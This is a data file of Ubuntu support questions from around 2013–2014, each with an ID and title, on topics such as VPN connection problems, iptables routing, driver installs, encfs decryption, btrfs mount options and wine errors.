402690	terminal single command resource usage	i cant find way to monitor single linux terminal command . i want to monitor this command : php index.php parse the problem is this process works too short to get pid so i hope there is something like this : singlecommandmonitor php index.php parse where singlecommandmonitor is software witch monitors ram , cpu ect . usage and php index.php parse is command i want to monitor . it should work similar to sudo , but instead of giving root permissions it should monitor resources . i hope someone will understand what i need : ) thank you for answers .
402691	handling ubuntu maas restful api login	what would be the best practice for obtaining ubuntu maas api login ? i have some troubles with making the maas restful api automatically obtaining successful login and perform a call . in summary , what i am trying to achieve is to simple call the api ( login , call a service and then logout ) . the problem i am facing is with managing the csrf token and pass it to the next call ( first make a get request to get the csrftoken and sessionid , then make a post for login and finally make a get request to the api for example . in this sequence on the get api call , i am always getting the 403 error message ( forbidden ) . i have observed that the post request to the /accounts/login/ is actually performing redirection to /maas/ , which seems to have confused my expected response or so , which is causing the sessionid/csrftoken not to be authenticated . the only way i have managed to make it working is simple to perform the authentication manually and then to import the sessionid and csrftoken into the get rest api call . nevertheless i would like to automate this process and any suggestions would be in a great appreciation . i am using groovy + wslite in the current setup . any similar implementation will be in good use .
402692	mouse cursor dissappearing/flickering when not moving ( xubuntu 12.04 / xfce 4.10 )	installed xubuntu 12.04 with xfce 4.10 on thinkpad e540 . when freshly booted , the mouse cursor works for about few minutes , then it starts to flicker and finally completely disappears , when not moving the mouse . if i move around some folder ( press/hold left mouse button ) the cursor works ok . very annoying problem , any help much appreciated !
402694	install canon lbp2900b on ubuntu 12.04 , 32bits	please tell me how to install canon lbp 2900b printer on ubuntu 12.04 .
402711	terminal alternative to gnome-keyring	i am currently using gnome-keyring to manage my ssh passwords . i would like to know if there are any alternatives to this , which i can use in situations when i do n't have access to the ui . i am currently running ubuntu 12.04 .
402715	how to make the laptop beep when battery is fully charged	i read about getting the laptop beeping when the battery charging is complete here . but i 'm confused with the answer ( and i did n't know yet , how to ask directly to a user ) . where can i find the file `` return0whencharging.sh '' .. ? or i must create it by my self ? if so , is there any particular folder where i should save the file ?
402718	network disapeared after update in ubuntu 12.04 lts	i am very new to ubuntu . i am pretty good with windows . i have a hp s7517 with windows xp that dual boots with ubuntu 12.04 lts . i checked for updates and it said there were several , so i started the update process . it displayed some error about grub ( what ever that is ) but otherwise completed ok . when i re-booted , neither the intel lan adapter built into the mother board and the rlt8192c usb wifi adapter show in the network manager . ( both work in windows xp ) sudo lshw -c network displays nothing at all . what do i do now ? rob westerfield
402721	control pc through ethernet line	i have my desktop setup with internet and have an ethernet connection to my raspberry pi , using network sharing the pi can access the internet . can i use the ethernet line to control the pi with my keyboard and mouse ?
402724	script showing file type ?	i want to make a script that shows what type of file is for example : ./file.sh haha test lala ssss haha -- > file test -- > directory lala -- > symbolic link ssss -- > executable im trying to do like this but i dont get the same result ... # ! /bin/bash function check_symboliclink { echo `` write symbolic link '' read something find $ something -type l echo `` $ something symbolic link '' ; } check_symboliclink is there someone have better idea to do like the example ?
402725	btrfs mount options not working	i 'm running ubuntu 12.04.3 lts i converted my data drives with btrfs . i first did apt-get update before installing btrfs-tools . unfortunately , that still only installed version 0.19 i can mount the drives , but the options compress=lzo and commit=60 are not recognized . since these options were not even present in v0.19 , that 's to be expected . i installed a .deb package , to update my btrfs-tools . when i run btrfs version , the answer is btrfs v3.12 so that 's up to date now . problem is , i still ca n't boot with commit=60 , and compression=lzo in fstab . fstab : /dev/sdf1 /mnt/6 btrfs rw , noatime , commit=60 , compression=lzo 0 2 when i delete those 2 options , everything works great . could this be because the drives were converted from ext4 to btrfs , using the older version ( 0.19 ) ? if so , can i update the fs somehow ?
402730	is it possible to setup multiple virtual hosts with one ip/domain ?	is it possible to setup multiple virtual hosts with one ip/domain ? we have a single domain ( example.com ) pointing to our server at ip ( 123.123.555.555 ) . at location 123.123.555.555 we require the following folder structure : # production level /htdocs/www/prod/proj1/ /htdocs/www/prod/proj2/ # dev level /htdocs/www/dev/proj3/ /htdocs/www/dev/proj4 where ideally we would like example.com to resolve to /htdocs/www/prod/ and example.com/dev to resolve to /htdocs/www/dev/ . simple enough no ? caveats : dev and prod need different setup directory/apache rules ( allow deny from , etc ) prod needs to resolve without prod in the url . example.com/proj1 would goto example.com/prod/proj1 attempts so far.. i 've tried setting up with the same virtual host , but giving a directory an alias of / sends it into a fit , claiming that it will be overwritten later . it makes sense because / matches / but also /dev i 've also tried setting up multiple virtual hosts with apache2 ' sites-available/sites-enabled but it seems i ca n't distinguish it based on the ip/domain . normally i would attempt something like < directory 'sub.domain.com ' > and < directory 'sub2.domain.com ' >
402731	what is the default application to show the uri in ubuntu ?	i have purged the yelp package from the system and my gnome apps now crashe when i try to display the help . it happens so because there 's no valid program for displaying uri 's in the system . i have the yelp package image that must be run when ubuntu tries to show the uri 's , so how can i do this ? perhaps , there is some system path file where i can add the path to this package or something like it .
402733	forticlient ssl vpn connected but can not access ip	i am using ubuntu 12.04 32 bit system . when i try to connect to vpn using forticlientsslvpn , it connects , but i can not access the ip . i tried many solutions and couldnt find anything useful/working . i am using http : //kb.cloud.it/files/tar-gz/forticlientsslvpn_linux_4-0-2281-tar.aspx .
402735	ca n't access lan behind openvpn from ubuntu 13.10	i 'm having trouble reaching the machines in a vpn . the server has a tap configuration and i can successfully connect from a windows 7 client . i 've been following mainly this guide to get everything set up : http : //www.howtogeek.com/60774/connect-to-your-home-network-from-anywhere-with-openvpn-and-tomato/ the strange part is that i can connect to the vpn , the server shows the connection , but i ca n't reach the other computers from the network when i 'm doing this from ubuntu . do i need to manually fix some kind of bridging on the client or should ubuntu automatically find the routes ? i read somewhere that it might be blocked by the firewall but i 'm positive that the firewall has been turned off on the client and on the server the firewall is obviously configured correctly or else i would n't be able to connect from a windows 7 client . the guide instructed me to go with openvpn 2.1.4 on windows and that 's what i 've done , on ubuntu i 've used the version in the repositories and this may have caused some issue but i do n't see why it would . here below is my client.conf : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sample client-side openvpn 2.0 config file # # for connecting to multi-client server . # # # # this configuration can be used by multiple # # clients , however each client should have # # its own cert and key files . # # # # on windows , you might want to rename this # # file so it has a .ovpn extension # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # specify that we are a client and that we # will be pulling certain config file directives # from the server . client # use the same setting as you are using on # the server . # on most systems , the vpn will not function # unless you partially or fully disable # the firewall for the tun/tap interface . dev tap # dev tun # windows needs the tap-win32 adapter name # from the network connections panel # if you have more than one . on xp sp2 , # you may need to disable the firewall # for the tap adapter . ; dev-node mytap # are we connecting to a tcp or # udp server ? use the same setting as # on the server . proto tcp # proto udp # the hostname/ip and port of the server . # you can have multiple remote entries # to load balance between the servers . remote removed.for-sake-of.security 1194 ; remote my-server-2 1194 # choose a random host from the remote # list for load-balancing . otherwise # try hosts in the order specified . ; remote-random # keep trying indefinitely to resolve the # host name of the openvpn server . very useful # on machines which are not permanently connected # to the internet such as laptops . resolv-retry infinite # most clients do n't need to bind to # a specific local port number . nobind # downgrade privileges after initialization ( non-windows only ) ; user nobody ; group nobody # try to preserve some state across restarts . persist-key persist-tun # if you are connecting through an # http proxy to reach the actual openvpn # server , put the proxy server/ip and # port number here . see the man page # if your proxy server requires # authentication . ; http-proxy-retry # retry on connection failures ; http-proxy [ proxy server ] [ proxy port # ] # wireless networks often produce a lot # of duplicate packets . set this flag # to silence duplicate packet warnings . ; mute-replay-warnings # ssl/tls parms . # see the server config file for more # description . it 's best to use # a separate .crt/.key file pair # for each client . a single ca # file can be used for all clients . ca `` /etc/openvpn/ca.crt '' cert `` /etc/openvpn/client.crt '' key `` /etc/openvpn/client.key '' # verify server certificate by checking # that the certicate has the nscerttype # field set to `` server '' . this is an # important precaution to protect against # a potential attack discussed here : # http : //openvpn.net/howto.html # mitm # # to use this feature , you will need to generate # your server certificates with the nscerttype # field set to `` server '' . the build-key-server # script in the easy-rsa folder will do this . ns-cert-type server # if a tls-auth key is used on the server # then every client must also have the key . ; tls-auth ta.key 1 # select a cryptographic cipher . # if the cipher option is used on the server # then you must also specify it here . ; cipher x cipher aes-128-cbc # enable compression on the vpn link . # do n't enable this unless it is also # enabled in the server config file . comp-lzo # set log file verbosity . verb 3 # silence repeating messages ; mute 20 is there anything else i must configure to get my ubuntu client to be a part of the network/have access to other machines ? update : this is the output from the client , as you can see it seems to be stuck in a loop , restarting the connection over and over again . i copied the output from the start until the second time it says initialization sequence completed . does it help provide an answer ? thu jan 9 18:52:37 2014 openvpn 2.3.2 x86_64-pc-linux-gnu [ ssl ( openssl ) ] [ lzo ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ ipv6 ] built on jul 12 2013 thu jan 9 18:52:37 2014 warning : file '/etc/openvpn/krs-niklas.key ' is group or others accessible thu jan 9 18:52:37 2014 socket buffers : r= [ 87380- > 131072 ] s= [ 16384- > 131072 ] thu jan 9 18:52:37 2014 attempting to establish tcp connection with [ af_inet ] 85.225.217.161:1194 [ nonblock ] thu jan 9 18:52:38 2014 tcp connection established with [ af_inet ] 85.225.217.161:1194 thu jan 9 18:52:38 2014 tcpv4_client link local : [ undef ] thu jan 9 18:52:38 2014 tcpv4_client link remote : [ af_inet ] 85.225.217.161:1194 thu jan 9 18:52:38 2014 tls : initial packet from [ af_inet ] 85.225.217.161:1194 , sid=444e38d7 ac8fcbca thu jan 9 18:52:39 2014 verify ok : depth=1 , c=us , st=ca , l=sanfrancisco , o=openvpn , cn=krs , emailaddress=mail @ host.domain thu jan 9 18:52:39 2014 verify ok : nscerttype=server thu jan 9 18:52:39 2014 verify ok : depth=0 , c=us , st=ca , o=openvpn , cn=krs , emailaddress=mail @ host.domain thu jan 9 18:52:41 2014 data channel encrypt : cipher 'aes-128-cbc ' initialized with 128 bit key thu jan 9 18:52:41 2014 data channel encrypt : using 160 bit message hash 'sha1 ' for hmac authentication thu jan 9 18:52:41 2014 data channel decrypt : cipher 'aes-128-cbc ' initialized with 128 bit key thu jan 9 18:52:41 2014 data channel decrypt : using 160 bit message hash 'sha1 ' for hmac authentication thu jan 9 18:52:41 2014 control channel : tlsv1 , cipher tlsv1/sslv3 dhe-rsa-aes256-sha , 1024 bit rsa thu jan 9 18:52:41 2014 [ krs ] peer connection initiated with [ af_inet ] 85.225.217.161:1194 thu jan 9 18:52:43 2014 sent control [ krs ] : 'push_request ' ( status=1 ) thu jan 9 18:52:43 2014 push : received control message : 'push_reply , dhcp-option dns 192.168.1.1 , route-gateway dhcp , ping 15 , ping-restart 60' thu jan 9 18:52:43 2014 options import : timers and/or timeouts modified thu jan 9 18:52:43 2014 options import : route-related options modified thu jan 9 18:52:43 2014 options import : -- ip-win32 and/or -- dhcp-option options modified thu jan 9 18:52:43 2014 tun/tap device tap1 opened thu jan 9 18:52:43 2014 tun/tap tx queue length set to 100 thu jan 9 18:52:43 2014 initialization sequence completed thu jan 9 18:52:49 2014 connection reset , restarting [ 0 ] thu jan 9 18:52:49 2014 sigusr1 [ soft , connection-reset ] received , process restarting thu jan 9 18:52:49 2014 restart pause , 5 second ( s ) thu jan 9 18:52:54 2014 socket buffers : r= [ 87380- > 131072 ] s= [ 16384- > 131072 ] thu jan 9 18:52:54 2014 attempting to establish tcp connection with [ af_inet ] 85.225.217.161:1194 [ nonblock ] thu jan 9 18:52:55 2014 tcp connection established with [ af_inet ] 85.225.217.161:1194 thu jan 9 18:52:55 2014 tcpv4_client link local : [ undef ] thu jan 9 18:52:55 2014 tcpv4_client link remote : [ af_inet ] 85.225.217.161:1194 thu jan 9 18:52:55 2014 tls : initial packet from [ af_inet ] 85.225.217.161:1194 , sid=ff99a93f 04c54987 thu jan 9 18:52:56 2014 verify ok : depth=1 , c=us , st=ca , l=sanfrancisco , o=openvpn , cn=krs , emailaddress=mail @ host.domain thu jan 9 18:52:56 2014 verify ok : nscerttype=server thu jan 9 18:52:56 2014 verify ok : depth=0 , c=us , st=ca , o=openvpn , cn=krs , emailaddress=mail @ host.domain thu jan 9 18:52:58 2014 data channel encrypt : cipher 'aes-128-cbc ' initialized with 128 bit key thu jan 9 18:52:58 2014 data channel encrypt : using 160 bit message hash 'sha1 ' for hmac authentication thu jan 9 18:52:58 2014 data channel decrypt : cipher 'aes-128-cbc ' initialized with 128 bit key thu jan 9 18:52:58 2014 data channel decrypt : using 160 bit message hash 'sha1 ' for hmac authentication thu jan 9 18:52:58 2014 control channel : tlsv1 , cipher tlsv1/sslv3 dhe-rsa-aes256-sha , 1024 bit rsa thu jan 9 18:52:58 2014 [ krs ] peer connection initiated with [ af_inet ] 85.225.217.161:1194 thu jan 9 18:53:00 2014 sent control [ krs ] : 'push_request ' ( status=1 ) thu jan 9 18:53:00 2014 push : received control message : 'push_reply , dhcp-option dns 192.168.1.1 , route-gateway dhcp , ping 15 , ping-restart 60' thu jan 9 18:53:00 2014 options import : timers and/or timeouts modified thu jan 9 18:53:00 2014 options import : route-related options modified thu jan 9 18:53:00 2014 options import : -- ip-win32 and/or -- dhcp-option options modified thu jan 9 18:53:00 2014 preserving previous tun/tap instance : tap1 thu jan 9 18:53:00 2014 initialization sequence completed
402742	how to change the message from policykit authentication agent ?	in policykit the localauthority component checks whether the action requested from policykit is allowed . its decision takes into account the user accounts and groups that exist locally on the computer . if a password entry is needed , policykit calls an authentication agent . this agent basically consists of an input mask . so i need to change the message `` system policy prevents setting ..blah blah blah.. this action '' from the authentication agent . i know that i can do it by editing the xml file of the policy in the /usr/share/polkit-1/action/policyname . then search for the tag in the xml file named message and edit there . i did that but nothing have changed . any suggestions ?
402743	keyboard layout incorrect on login	my keyboard layout is supposed to be the swiss-french keyboard ( qwertz , pretty similar to the english qwerty ) . here is what 's really happening : when the login screen appears , the keyboard layout is correct ( qwertz ) . i know that because i can enter my password . when i log in , the keyboard layout switches to qwerty , even though the only configured layout is qwertz . the icon in the tray displays swiss french and there is no other choice in the drop-down menu . when i click the already selected option swiss french in the drop-down menu , it realizes its mistake and gives me the correct qwertz keyboard layout . additionnal informations : i 'm using 13.10 on an acer aspire v3-571g laptop . only my ( cursed ? ) session has this problem on the computer .
402744	ca n't install any sw	fumetaloca @ fumetaloca-extensa-5635zg : ~ $ sudo apt-get install imagej reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : imagej : depends : openjdk-6-jre but it is not going to be installed or sun-java6-jre but it is not installable w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : unable to correct problems , you have held broken packages . fumetaloca @ fumetaloca-extensa-5635zg : ~ $ how i can fix this ? update does n't work , change server too . and it 's with all sw , which i try to install ... feel really lost .
402749	hp proliant dl360 g4p with 13.10 server has network issues	i 've just installed ubuntu server 13.10 x64 on my hp proliant dl360 g4p . i 've configured the two hdd as raid1+0 and the installation is proceeded without problems ( except during the partitioning step , it was saying that the drive was busy [ or something similar ] and i 've chosen `` ignore '' ) now the server is up and is configured on my nt intranet , the main problem is that the network adapter looks not completely working . when i ping the server , i lose some packets before it starts reply , and during the ping some packet is lost . the network adapter is : hp nc7782 gigabit server adapter and the server has 2 of them on board . any help ?
402750	disabling touchscreen to extend battery life ?	i 've read various posts about extending battery life of laptops and notebooks . and i 've done various of things to extend it . but i 'm wondering does touchscreen take power and how much ? would it be good idea to disable touchscreen and is it even possible ? i 'm using lenovo ideapad s210 touch . and i do n't need touchscreen at all . edit : sorry forgot to say that i 'm using ubuntu 12.04 lts , 64bt . .silouan
402751	rec utility from sox on ubuntu server 12.04 does n't record sound	i am trying to record sound with rec utility from sox on ubuntu server 12.04 rec tx.wav this does n't record sound . but program works and show recording process . but without sound . arecord -f dat -d 20 test.wav arecord soft works and record sound . why my rec utility does n't work ? and how can i configure it ?
402754	is it possible to install gnome 3.10 in ubuntu 12.04 ?	i have gnome 3.4.2 installed , but i want to update gnome to 3.10 . is this possible ? how can i do it ?
402757	need wifi driver of mediatek 7630 for ubuntu 12.04	my laptop ( hp pavilion 15-n004tx ) is not detecting the wifi . it is having device mediatek mt 7630 . please suggest me the solution for this .
402759	how can i create unity dash integration for my python script ?	i have written an awesome script in python and i seriously think it should help many rookie ubuntu users out there -- especially for a quick solution/tip . my script searches through askubuntu.com and finds you the best answer for your question . yup , it does work , and it works pretty well . how it works video : ask - find the best answer to your questions related to ubuntu in just 1 second ! ! ! - youtube github repo : github : drpaneas/ask now , all i need is to implement my python script for the dash instead of the terminal . for example , type a question in the dash and then my script will print you the outcome . can you help me to do that or could you please provide me some kind of tutorial or guide ?
402760	how to solve the error : `` sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log ''	i have recently installed ubuntu 12.04 and on updating driver from gui additional driver , it prompts me for the missing of broadcom driver . on accepting the download option . the message get prompted sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i am new with ubuntu can any one suggest how can i over come this issue and get wifi network enabled on my compaq presario kernel 3.8
402762	problems with vpn ( astrill ) and internet speed on ubuntu 12.04	so here is the story , i installed ubuntu 12.04 as my second os on acer laptop . at first everything were smooth and fast ... but then we had a problem with network and a guy from a company came over and changed a modem ( not rooter ! ! ! ) . right now i ca n't even log in to my astrill account ( using desktop app ) and normal internet ( with vpn logged out ) is really slow - it takes something like 30 sec to just load google start page . i 'm asking for help ! p.s if i 'm using windows everything is just flying ... .. p.p.s i 'm located in shanghai , china . behind gcf
402763	ubuntu 13.10 install problem	my laptop in already install windows 8 and inside hard drive is 4 partition but install ubuntu only show 2 partition ?
402774	encfs wo n't decrypt my encrypted folder - password incorrect	i use encfs to backup my data to my external hard drive . until yesterday everything has always gone fine . then , after formatting my internal hard drive , i needed to access data on my encrypted folder i used an old lucid ( 10.04 ) install to mount my encrypted folder ( was using 12.04 on my pc and it was the only available linux install around ) cryptkeeper accepted my password and mounted the directory , but the latter was empty i tried unmounting then remounting it , but this time i got a `` password incorrect '' message i tried to mount another encrypted folder ( which had a different password ) , it went exactly the same : password accepted , the mounted directory is empty , then after unmounting/remounting the password is n't accepted anymore i even tried to boot from a 13.10 live usb but this time encfs would n't accept the password ( for either encrypted folders ) question how can i recover my data now ? i have lost half of my documents now , some of which are professional works .
402783	badblocks taking really long time . or is it frozen ?	so i issued the sudo badblocks -nv /dev/sda6 yesterday . i just woke up and it 's still like that . the documentation here http : //www.clearfoundation.com/docs/man/index.php ? s=8 & n=badblocks says that the -n parameter specifies that the test should be non-destructive but takes a little longer time . is it working or is it frozen or what ? does anyone know ?
402785	writes occurring to fresh ext4 partition every second endlessly . cause and solution ?	i 've an external 500gb hdd connected to my laptop which runs ubuntu 12.04 . i 've formatted the external drive with one ext4 partition which spans the entire disk . my problem is that the disk makes noise every second , because writes occur to it . i 'm not actively writing any file to the disk or use the disk otherwise . it 's just mounted and should be idle . using iotop , i can see that with the disk plugged in , some jbd2 process writes to the disk . this jbd2 process does not do anything if the disk is not plugged in . the noise also immediately stops if i unmont the drive , but keep it plugged in . iotop : total disk read : 0.00 b/s | total disk write : 1838.15 k/s tid prio user disk read disk write swapin io > command 3727 be/3 root 0.00 b/s 0.00 b/s 0.00 % 0.15 % [ jbd2/sdb1-8 ] 1 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % init 2 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ kthreadd ] 3 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ ksoftirqd/0 ] ... first of all , the noise drives me crazy . i work in a quiet environment and this allbeit very low noise is so disturbing somehow . second , i think that this continous writes to the disk might cause it 's lifetime to degrade . this would be especially important for ssd drives , where the noise is n't present , but the same behavior can be observed . moreover , i think that writes to the disk should not be necessary , since no user process is accessing the disk and the operating system surely does not need to access an external hdd for its operation . what causes these write accesses and how to stop them ?
402787	macbookpro5,5 broadcom sta wireless driver fails to install ( ubuntu 12.04 )	it says `` sorry , installation of this driver failed '' here 's the log : 2014-01-09 12:50:31,831 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2014-01-09 12:50:36,216 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2014-01-09 12:50:36,217 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2014-01-09 12:50:36,258 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted
402795	why does wine give me error when i want to run psiphon	when i run the following command : wine '/var/www/psiphon.exe' i get the below error : fixme : storage : create_storagefile storage share mode not implemented . err : mscoree : loadlibraryshim error reading registry key for installroot fixme : seh : rtladdfunctiontable 0x4c6ea0 1 4a0000 : stub fixme : seh : rtladdfunctiontable 0x68f5b6a0 1 68f40000 : stub fixme : iphlpapi : notifyaddrchange ( handle 0xece278 , overlapped 0xece240 ) : stub p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory fixme : storage : create_storagefile storage share mode not implemented . fixme : ntdll : find_reg_tz_info ca n't find matching timezone information in the registry for bias -210 , std ( d/m/y ) : 22/09/2014 , dlt ( d/m/y ) : 22/03/2014 err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot fixme : iphlpapi : notifyaddrchange ( handle 0x11de8ac , overlapped 0x11de890 ) : stub p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory wine : configuration in '/root/.wine ' has been updated . fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : ras : rasenumentriesw ( ( nil ) , ( null ) ,0x143180,0x33fa14,0x33fa1c ) , stub ! fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory the program gets started , but does not open filtered sites . in firefox i 've set : use system proxy settings . psiphon gives error 404 bad request when psiphon gets connected .
402805	problem with compizconfig setting manager ?	i 've installed ccsm , but unfortunately not a single check boxes are responding.i can not check the empty check boxes or vice-versa.what 's wrong ? please help !
402806	partial upgrade from 12.04 now ca n't boot	i went through the process of running a partial upgrade in 12.04 , now when i reboot , i get stuck at a black screen with a cursor . any help ? i have reinstalled nvidia drivers by going through the terminal but the problem still persists !
402814	graphical user interface seems to terminate on relogon	on ubuntu 12.04 the graphical user interface crahes somehow , when i want to re-login after the screen is logged due to a time out . when i want to enter the password the screen goes black with a blinking underscore . the mouse is still visible though . with ctrl+alt+f1 one can re-login in command line mode . but i do n't know how to restore the graphical user interface . anyway , this should not happen . if i manually lock the screen with ctrl+alt+l , it is possible to enter the password and log in again as expected . ( i have no idea how to debug this . if you need more information , i 'll try to provide it . )
402819	internal microphone disappeared from capture devices in kubuntu 12.04	i am kubuntu 12.04 lts . the machine is lenovo x300 . my internal microphone worked just fine until recently it stopped . i checked it in mixer and the internal mic disappeared from the capture devices there . it used to be shown there . i tested the situation with an external usb mic and everything works well . any idea what might have caused that ? personally , i suspect some update as i have n't played with audio configurations .
402823	ubuntu 13.10 time sync issues with vmware player	i 'm running ubuntu 13.10 ( 64 bit ) on vm player on windows 7 host . everything is running fine except that my time is out of sync . i have set the correct timezone and everything . but for some strange reason , the time is out of sync .
402825	gnome overlay scrollbar in firefox	i 've been looking for a way to get gnome 's overlay scrollbar working in firefox . by its appearance , it seems like firefox is using the standard non-overlay gtk scrollbar , but i have n't found a way to get it to use the overlay version as illustrated below : i ran across this article with a gtk 2 configuration but despite appearing to attempt to mimic the gnome appearance , it does n't seem to work as the scrollbars disappear altogether . is there any way to get the overlay scrollbar working in applications like firefox ?
402827	last supported version of ubuntu	what is the last supported version of ubuntu to date ? i thought version 4.1 was still supported , but i fear not . someone told me that 10.4 may still be supported . for test purposes , i have been using 12.04 ( new version ) and 4.10 ( old version ) - but i am having loads of issues with 4.1 i have looked on ubuntu 's website , but i do n't know where to look on there .
402832	how do i allow only one user to su to another account ?	i have user-a and user-b on my box . how do i do a no-password su - user-b as user-a ?
402834	how to configure linux routing as hidden router	hi i need my linux box to route all communication from one ethernet to other and back with no one knowing about the box . i have this configuration : i have local network on eth3 1 pc on eth2 eth3 has ip 10.1.1.60 eth2 has ip 192.168.0.1 and computer on eth2 has dhcp assigned 192.168.0.20 also i need ports 22 and 11082 to stay on router for configuration and communication with deamon i need all my comunication from computer on eth3 ( e.g . 10.1.1.50 ) to ping and communicate with computer on eth2 via 10.1.1.60 ( so computer on 192.168.0.20 behaves as 10.1.1.60 ) i have this script but it is not working # ! /bin/bash # lan eth0=eth3 # computer eth1=eth2 eth1localip=192.168.0.1 eth1cp=192.168.0.20 iptables=/sbin/iptables echo `` flushing iptables ... '' $ iptables -f $ iptables -f -t nat echo `` masquerade ( snat ) for printer ... '' $ iptables -a postrouting -t nat -s $ eth1cp -j masquerade -o $ eth0 $ iptables -a forward -i $ eth1 -j accept $ iptables -a input -i $ eth1 -j accept echo `` accepting local ssh access ... '' $ iptables -a prerouting -t nat -p tcp -i $ eth0 -- dport 22 -j accept echo `` ip forwarding ( dnat ) for printer ... '' $ iptables -a prerouting -t nat -i $ eth0 -j dnat -- to-destination $ eth1cp $ iptables -a forward -p tcp -d $ eth1cp -j accept i 've found out that the communication from lan to pc is working . running wireshark on router i can see the ping going from 10.1.1.50 via 10.1.160 to 192.168.0.20 but it is not returning anything back edit : i can not set it as bridge because : i have not enabled bridges in kernel i need to be able to leave port 11082 on router same as 22 for ssh there can be only one ip from lan used ( i can not assign 2 addreses from dhcp 10.1.1.x )
402850	unable to mount : exit code 1	i am trying to mount some of my hard drive and usb but getting this error error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdd1 on /media/sdd1 how can i fix this ? there is no drive by the name of /dev/sdd1 and no /media/sdd1 cause when i try to unmount/detach it i get : root @ sysadmin-ms-7592 : /home/sysadmin # udisks -- unmount /dev/sdd1 unmount failed : device is not mounted root @ sysadmin-ms-7592 : /home/sysadmin # udisks -- detach /dev/sdd1 detach failed : device is not a drive
402861	remove alt-f2 history - trying to remove password .	how do i remove the history for alt+f2 ? i accidentally typed my password in there and now i can not get rid of it . i have tried the old way for gnome2 which was under gnome-settings . i have also tried unity-runner and set that to default . neither of them work . i am running ubuntu 12.10 and gnome 3 . i have tried every method that i was able to find on the internet thus far and nothing has worked . my alt+f2 history remains . even tried a complete removal of gnome and re-install no luck . if anybody could help me it would be greatly appreciated .
402869	can not install geda-gschem in 13.10	when i am trying to install the package geda-gschem from universe repo , i get the output : sudo apt-get -f install geda-gschem reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : geda-gschem : depends : libgeda ( > = 43 ) but it is not installable recommends : extra-xdg-menus but it is not going to be installed e : unable to correct problems , you have held broken packages . the repo contains the package libgeda43 , but it is not recognized as the required package libgeda . does anybody know what can i do with that ? thanks .
402870	ms word error message under wine hq	i had installed ms word through wine on my ubuntu desktop . it work perfectly . but everytime when i run ms word 07 i have error message . if close this a error window . word still runs and works fine . how to fix this pesky message ?
402877	gparted and ubuntu installer does not recognize windows partition , but ubuntu does	so , i 'm trying to set up a dual-boot of windows 7 ult 64-bit with ubuntu on my computer . the computer has uefi firmware and originally came with win 8 . it has a 16gb ssd and a 1tb hdd . i intend for ubuntu to go on the ssd and windows to remain on the hdd . when i try to install ubuntu , the installer does not detect the windows partition . in addition , gparted does not detect the windows partition , stating that there traces of a gpt partition scheme but no fake ms-dos on the hard drive . when i ran fixparts i got the same message , stating that there were traces of a gpt partition on the drive . now , despite the installer and gparted failing to read the hdd , when running ubuntu off of a live disk , i can successfully access the windows file system , read , and write files into it . how can i get ubuntu to correctly recognize the windows partition ? i do not have a windows disk with me , so ca n't reinstall it . will removing the gpt destroy the windows partition , or will it leave it intact and still bootable ?
402880	how to install glui in ubuntu 13.10 ?	question explains almost of it . i tried running sudo apt-get install libglui2c2 . this gives an error unable to locate package libglui2c2 . this problem seems to exist only in ubuntu 13.10 . it was not even installed by default . compiling gives an error saying `` unable to locate glui.h '' . how can i install glui ? os : ubuntu 13.10
